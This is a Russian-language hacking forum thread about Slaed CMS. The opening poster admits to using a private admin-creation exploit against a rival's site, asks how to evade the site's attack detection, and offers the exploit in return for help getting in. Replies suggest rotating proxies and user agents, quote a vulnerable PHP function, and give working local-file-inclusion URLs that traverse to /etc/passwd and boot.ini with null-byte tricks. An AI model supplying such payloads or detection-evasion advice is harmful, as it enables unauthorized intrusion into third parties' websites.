Совершенно случайно ко мне в руки попал приватный эксплоит для удаленного создания администратора в MySQL Slaed CMS Начал тестировать на своем сайте, нормально. Все работает. Никаких предупреждении, что была попытка атаки не поступалала, и в логах не записывалось. Перешел на портал неприятеля(очень сильно мешает) Начал тестировать: и тут меня попросили пройти лесом, якобы была попытка атаки и пр. вообщем, автобан дали. Как это обойти? Сплоит недавный, выпущен на этой недели. Сможете помочь проникнуть в систему, поделюсь задаром Не туда тему отпостил, только сейчас заметил, модераторы, пожалуйста перенесите
Если сплоит не юзает списки проксиков и не меняет юзер агенты, то вполне могут и палить количество запросов.. по некоему идентификатору..
Скачал последнюю версию с оффсайта Slaed CMS. Кинулся в глаза код в файле function/sources.php: PHP: function get_lang($module="") { global $multilingual, $currentlang, $language, $user_cookie_t; if (isset($_REQUEST['newlang']) && $multilingual == "1") { if (file_exists("language/lang-".$_REQUEST['newlang'].".php")) { setcookie("lang", $_REQUEST['newlang'], time() + intval($user_cookie_t)); require_once("language/lang-".$_REQUEST['newlang'].".php"); Вызов функции get_lang идет в файле index.php, PHP: require_once("function/function.php"); get_lang(); Поетому, при magic_quotes_gpc = off есть возможность заюзать локальный инклуд Code: http://[targethost]/index.php?newlang=../../../../../../../../../../etc/passwd%00 Попробуй, может поможет.
The_HuliGun в данном случае нельзя. через такую конструкцию Code: language/lang-".$_REQUEST['newlang'].".php в newlang можно передать локальные фвайлы из папки language, которые наячинаются с lang- =)) . фолдеры через нее не передадутся. можешь проверить на локалхосте
blackybr, я тоже сперва хотел написать, что инклуда на самом деле нет, но когда я проверил на локалхосте, то все отлично работало. Так что проверь сам и убедись =) Попробуй так: http://localhost/slaed/html/?newlang=/../../index The_HuliGun +1
На сайте не прокатило... Как мне сказали в личке, обнаружение атаки идет по той причине,что ведуться логи администратора...
Конечно будет работать, не знаю что тебя здесь удивило? Хотя есть одна особенность, как вы поняли, инклуд проходит через несуществующую папку. Например если инклудить Code: ?newlang=not_exist/../../../boot.ini%00 Тогда получаем путь Code: language/lang-not_exist/../../../boot.ini%00 И по сути папка lang-not_exist на системе не существует, а инклуд проходит. В свое время меня тоже мучил вопрос о инклуде через несуществующую папку, и я заметил характерную вещь для *nix систем: если иклудить с %00 в конце тогда все инклудится прекрасно, если без %00 тогда инклудить не хочет.
Я сказал по своим наблюдениям. У меня на винде инклудит через несущ, на эмуле же под слакой нет =) в 1ом пхп 5.1.2, 2 - 4.4.4